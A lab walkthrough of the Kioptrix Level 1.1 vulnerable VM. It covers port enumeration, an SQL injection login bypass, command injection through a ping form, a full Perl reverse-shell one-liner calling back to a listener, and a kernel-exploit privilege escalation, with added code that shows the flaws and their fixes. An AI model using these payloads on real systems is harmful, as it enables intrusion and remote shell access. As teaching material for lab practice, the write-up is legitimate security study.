Kioptrix 2

Kioptrix Level 1.1

This one taught me something I should have learned a long time ago. By the end of this VM I was banging my head against a wall for no reason at all, although in fairness I had already done several vulnerable machines that night.

Enumeration

I started off by creating a folder on the desktop labeled kioptrix_1.1 and then began my enumeration steps. I know the folder step sounds silly, but over two rounds of PWK labs and a lot of boxes on Hack The Box I have come to appreciate methodology and organization. The more organized you are during enumeration, the faster you get into a box.

I started off with nmap -sV -p- 10.0.0.52

The above nmap command translates to: scan this IP address with these flags, where -p- means all 65535 TCP ports (instead of the default top 1000) and -sV means probe each open port for service and version information. Adding -sC would also run the default NSE scripts in the same pass. This tool is huge and should be researched; if you are not familiar with nmap, the docs are on the nmap website, and there is a handy cheat sheet over at highon.coffee as well.

The output from the above nmap command.

[Screenshot: nmap output listing the open ports]

The next step is to go over the information above, port by port.

  • 22 – SSH. Unless I have a list of users to try with rockyou or SecLists, most of the time I don't bother unless I see a funky version number
  • 80 – Awesome, Apache with a version number I can google, and the banner tells me it's CentOS
  • 111 – rpcbind/portmapper. Again a port I don't mess with unless I see something funky
  • 443 – Same as port 80, except never ignore it: run all the same tests you would on port 80 here, because the HTTPS side can serve different content
  • 631 – CUPS 1.1. CUPS is the printing system on Linux, and there is a version number, so we need to google it for low-hanging fruit
  • 767 – The status RPC program (rpc.statd, registered with the portmapper on 111). Google it and see what commonly listens there; you might come up with something, but there is much lower-hanging fruit than this
  • 3306 – MySQL, reported as unauthorized because the server refuses connections from my host. Need to look at this and see if there are any vulns, or maybe accounts without passwords

I need to make a judgment call here about what to start poking at first. Port 80 has a version number for Apache, so I open a terminal and use nikto to scan port 80. Nikto is the de facto standard web server scanner, and the GitHub repo has the documentation.

[Screenshot: nikto scan output against port 80]

From the scan results I can see the allowed HTTP methods, the Apache version, PHP query strings, the TCN header message, and several web directories. So we searchsploit Apache 2.0.52 and explore the new web directories. On going to the website itself I found a login page (I should have just checked this at the start).

[Screenshot: web login page]

So I get to this page and try basic defaults like admin / admin, and right-click to view the source to make sure there isn't a redirect or a hidden field. I also start throwing some special characters into the fields to see if I can provoke any error messages. This SQL injection cheat sheet from Netsparker has some basic SQL injection payloads for auth bypass.

 ' or 1=1--

Using the above SQLi in both the username and password fields bypasses authentication and logs you in to a new index page that asks you for a host to ping. The quote closes the string literal, or 1=1 makes the WHERE clause always true, and -- comments out the rest of the query. One caveat: MySQL only treats -- as a comment when it is followed by whitespace, so ' or 1=1--  with a trailing space, or ' or '1'='1, is the more portable form to try if the bare version does not work.
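The bypass above, as an added example that is not part of the original post or the Kioptrix application code. It assumes the login builds its SQL by pasting the two form fields straight into the query string (the page never shows the real query), uses a constructed in-memory sqlite table instead of the box's MySQL, and puts the parameterized version beside it so the fix is visible:

```python
import sqlite3

PAYLOAD = "' or 1=1--"   # the auth-bypass string from the write-up


def make_db():
    """Constructed stand-in for the login database (assumption: schema is not on the page).

    Passwords are stored in clear only to keep the focus on the injection.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def vulnerable_query(username, password):
    """Assumed shape of the login query: form fields concatenated into the SQL text."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Runs the concatenated query; returns the usernames the database matched."""
    return [row[0] for row in conn.execute(vulnerable_query(username, password))]


def safe_login(conn, username, password):
    """Same query with bound parameters: the input is data and can never alter the SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Returns the outcome of each login attempt so the difference can be inspected."""
    conn = make_db()
    return {
        # The query that actually reaches the database once the payload is in both fields:
        # everything after the injected -- is a comment, leaving WHERE username='' or 1=1.
        "query": vulnerable_query(PAYLOAD, PAYLOAD),
        "vulnerable": vulnerable_login(conn, PAYLOAD, PAYLOAD),     # bypass succeeds
        "vulnerable_wrong_pw": vulnerable_login(conn, "admin", "wrong"),
        "safe": safe_login(conn, PAYLOAD, PAYLOAD),                 # bypass fails
        "safe_legit": safe_login(conn, "admin", "correct-horse-battery"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-20s %r" % (name, result))
```

sqlite treats -- as a comment regardless of what follows it, which is why the bare payload works unchanged here; on the box's MySQL the trailing-space caveat in the text applies.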

[Screenshot: ping form on the post-login index page]

I ping 127.0.0.1 to see what it does, and it echoes the ping output back to the page. If that input is being dropped into a shell command, a | will let me run a second command: the shell starts both sides of the pipe, and ls ignores its stdin, which is why only the directory listing comes back rather than the ping output.

| ls -al

and that returns a directory listing of the web root.

| cat pingit.php

Use the above to see how pingit.php works. Only the tail of the file survived extraction here: the opening <?php tag and the lines that read the submitted form field into $target were swallowed along with the HTML tags the echo calls emit (presumably <pre> and </pre>, restored below).

        echo '<pre>';
        echo shell_exec( 'ping -c 3 ' . $target );
        echo '</pre>';
} ?>

So we have arbitrary command injection: the submitted target is concatenated onto the command string with no validation, and shell_exec runs the result through /bin/sh, so any shell metacharacter in the input is honoured. We should be able to get a local shell as the web server's user.
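To make the bug and its fix concrete, here is an added example that is not part of the original post or of pingit.php. It reconstructs the vulnerable command string the way shell_exec receives it (the assumption being that $target is the raw form value, which is all the surviving PHP shows), flags the metacharacters an attacker relies on, and then shows the hardening a practitioner would actually apply: an allowlist of what a ping target may look like, and handing the command to the OS as an argv list so no shell parses the input at all.

```python
import ipaddress
import re
import subprocess


def vulnerable_command(target):
    """The string pingit.php builds: raw concatenation, later run through /bin/sh."""
    return "ping -c 3 " + target


# Characters a POSIX shell interprets as operators. This denylist is only here to make
# the injection visible in tests; filtering on it is NOT the fix (encodings, IFS tricks
# and platform-specific parsing all chip away at denylists).
SHELL_METACHARS = set(";&|`$<>()\n")


def shell_metachars(target):
    """Sorted list of shell metacharacters present in the input."""
    return sorted(c for c in set(target) if c in SHELL_METACHARS)


# Allowlist: an IP literal or a DNS hostname (labels of letters, digits and hyphens,
# not starting or ending with a hyphen). Rejecting a leading '-' also stops the input
# from being read as a ping option when it lands in argv.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_target(target):
    """True only for something a ping form should legitimately accept."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return len(target) <= 253 and HOSTNAME_RE.match(target) is not None


def safe_argv(target):
    """argv for subprocess.run(..., shell=False); raises ValueError on anything else."""
    if not is_valid_target(target):
        raise ValueError("rejected ping target: %r" % target)
    return ["ping", "-c", "3", target]


def rejects(target):
    """Helper for callers/tests: does the hardened path refuse this input?"""
    try:
        safe_argv(target)
    except ValueError:
        return True
    return False


def safe_ping(target):
    """Hardened replacement for the shell_exec call: no shell, validated argument, timeout."""
    return subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    injected = "127.0.0.1|ls -al"          # the payload from the write-up
    print("shell sees :", vulnerable_command(injected))
    print("metachars  :", shell_metachars(injected))
    print("allowlisted:", is_valid_target(injected), is_valid_target("127.0.0.1"))
    print("argv       :", safe_argv("127.0.0.1"))
```

The two hardening steps are independent and both matter: the allowlist stops the pipe payload and the perl one-liner outright, while the argv list guarantees that even a value the regex mis-judges is passed to ping as a single argument rather than being re-parsed by a shell.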

Start your netcat listener on the port the payload will connect back to (4432 in the one-liner below).

[Screenshot: netcat listener waiting on port 4432]

I used the Perl reverse shell below, but plenty of other reverse shells would have worked too. Pentest Monkey has an awesome cheat sheet for reverse shells, and highon.coffee has a nice one as well.

perl -e 'use Socket;$i="10.0.0.50";$p=4432;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We put a real target first so the ping command stays valid, then use | to chain the one-liner onto it. Submitted through the form, it connects back and the listener gets a shell as the web server's user:

127.0.0.1|perl -e 'use Socket;$i="10.0.0.50";$p=4432;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

[Screenshot: reverse shell caught by the netcat listener]

Priv Esc

Start your Python simple HTTP server to serve the enumeration scripts to the target. I prefer to use Python when I can; it is fast to stop and start.

[Screenshot: Python HTTP server serving the scripts]

There are two scripts I use: linuxpriv.py and LinEnum.sh.

The number of times I have referenced g0tmi1k's blog, it might as well be open all the time, at least during PWK!

Long story short, I ran the two scripts, combed through the output, and kept looking at different things. I knew I was looking for something simple. Looking at Abatchy's blog, there was something I had overlooked and never should have. It should have been step one once I got a local shell, right after id or whoami: I didn't check the kernel version. It was staring me in the face while I looked for vulnerable packages and bad configurations. This box taught me to always check the basics, and after 10 or 15 minutes of hunting to go back and look at the basics again. A simple uname -a would have saved me hours of being flustered for no reason.

[Screenshot: uname -a output]

The first thing that comes up when you google 2.6.9-55 is this exploit. Before running any kernel exploit, confirm the target's architecture and that gcc is available on it (or build on a matching system), and remember that a failed kernel exploit can take the box down.

Compile, run, and root!

[Screenshot: root shell]